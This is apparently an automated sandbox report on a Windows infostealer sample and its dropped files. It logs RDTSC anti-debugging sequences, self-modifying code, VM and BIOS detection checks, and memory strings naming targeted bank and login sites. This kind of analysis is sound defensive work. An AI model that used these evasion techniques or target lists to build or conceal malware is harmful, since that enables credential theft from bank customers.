Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10114 second address: D10118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10118 second address: D1011C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D1011C second address: D10122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10122 second address: D10128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10128 second address: D1012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D1012C second address: D10138 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10138 second address: D1013E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D1013E second address: D10142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10E18 second address: D10E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10E1E second address: D10E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D10E22 second address: D10E33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D11509 second address: D1150D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D1150D second address: D11511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D11511 second address: D11568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F8AF10CF434h 0x00000012 jp 00007F8AF10CF426h 0x00000018 jmp 00007F8AF10CF42Ch 0x0000001d jg 00007F8AF10CF426h 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c push edx 0x0000002d pop edx 0x0000002e popad 0x0000002f jo 00007F8AF10CF432h 0x00000035 jg 00007F8AF10CF426h 0x0000003b jbe 00007F8AF10CF426h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D11D91 second address: D11D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D11D99 second address: D11D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D142A0 second address: D142C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8AF15A7F69h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8AF15A7F56h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D142C8 second address: D142E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF10CF438h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D142E6 second address: D142EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D19A57 second address: D19A7B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8AF10CF426h 0x00000008 ja 00007F8AF10CF426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jl 00007F8AF10CF426h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D1FF22 second address: D1FF36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F8AF15A7F56h 0x00000009 jnc 00007F8AF15A7F56h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D2AA51 second address: D2AA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D3225B second address: D3227E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F61h 0x00000007 jnp 00007F8AF15A7F56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 je 00007F8AF15A7F56h 0x00000016 pop ecx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D39C5D second address: D39C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D39C63 second address: D39C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D3FA05 second address: D3FA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C45679 second address: C4567F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D42D55 second address: D42D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F8AF10CF426h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D472AD second address: D472B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D47652 second address: D4765C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D47AC4 second address: D47AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8AF15A7F66h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D486F8 second address: D48719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF42Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8AF10CF431h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D4B1E2 second address: D4B223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F8AF15A7F6Fh 0x0000000d jmp 00007F8AF15A7F60h 0x00000012 popad 0x00000013 jng 00007F8AF15A7F78h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D4B3F5 second address: D4B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D5056B second address: D505C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F62h 0x00000007 pushad 0x00000008 jne 00007F8AF15A7F56h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F8AF15A7F68h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jl 00007F8AF15A7F7Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8AF15A7F64h 0x00000025 jns 00007F8AF15A7F56h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D505C5 second address: D505C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D65988 second address: D65996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8AF15A7F56h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D65996 second address: D659A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D659A4 second address: D659A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D65B4F second address: D65B59 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6DA10 second address: D6DA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6CDF7 second address: D6CE32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8AF10CF426h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f jmp 00007F8AF10CF42Dh 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 jmp 00007F8AF10CF436h 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6D6CC second address: D6D6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F8AF15A7F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F8AF15A7F5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6D6E9 second address: D6D6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6D6F5 second address: D6D6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6D6FE second address: D6D702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6D702 second address: D6D721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D6D721 second address: D6D725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D7208C second address: D720AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 jmp 00007F8AF15A7F69h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D720AC second address: D720BC instructions: 0x00000000 rdtsc 0x00000002 je 00007F8AF10CF428h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D77734 second address: D7773A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D736EB second address: D736F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D736F2 second address: D736F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D721EC second address: D721F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D721F3 second address: D721F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D721F8 second address: D721FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D721FE second address: D7224F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8AF15A7F66h 0x0000000b popad 0x0000000c jmp 00007F8AF15A7F69h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnl 00007F8AF15A7F56h 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F8AF15A7F56h 0x00000026 jbe 00007F8AF15A7F56h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D7224F second address: D72253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D72253 second address: D72259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D72398 second address: D723B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8AF10CF426h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F8AF10CF42Eh 0x00000015 jnc 00007F8AF10CF426h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D72542 second address: D72559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D72559 second address: D7255F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D7255F second address: D7256B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: D7256B second address: D72575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8AF10CF426h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\es5qBEFupj.exe	RDTSC instruction interceptor: First address: C8F1F1 second address: C8F1FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Special instruction interceptor: First address: AD9C8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Special instruction interceptor: First address: C835D0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Special instruction interceptor: First address: C83971 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Special instruction interceptor: First address: AD74DA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Special instruction interceptor: First address: C81E6A instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Memory allocated: 54A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Memory allocated: 5670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Memory allocated: 7670000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\es5qBEFupj.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\es5qBEFupj.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Window / User API: threadDelayed 4832

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

API coverage: 3.8 %

Source: C:\Users\user\Desktop\es5qBEFupj.exe TID: 3504	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 8016	Thread sleep time: -150000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\Set-up.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_00406301 FindFirstFileW,FindClose,	7_2_00406301
Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exe	Code function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0011DC54
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0012A087
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	21_2_0012A1E2
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	21_2_0011E472
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0012A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	21_2_0012A570
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_000EC622 FindFirstFileExW,	21_2_000EC622
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_001266DC FindFirstFileW,FindNextFileW,FindClose,	21_2_001266DC
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_00127333 FindFirstFileW,FindClose,	21_2_00127333
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_001273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	21_2_001273D4
Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com	Code function: 21_2_0011D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	21_2_0011D921

Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com

Code function: 21_2_000B5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

21_2_000B5FC8

Source: C:\Users\user\Desktop\es5qBEFupj.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\768400	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\768400\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user~1\AppData\	Jump to behavior

Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000002.1322469608.0000000000C64000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: es5qBEFupj.exe	Binary or memory string: `HGfS{
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Set-up.exe, Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000003.1280366142.0000000005300000.00000004.00001000.00020000.00000000.sdmp, es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: DetectVirtualMachine
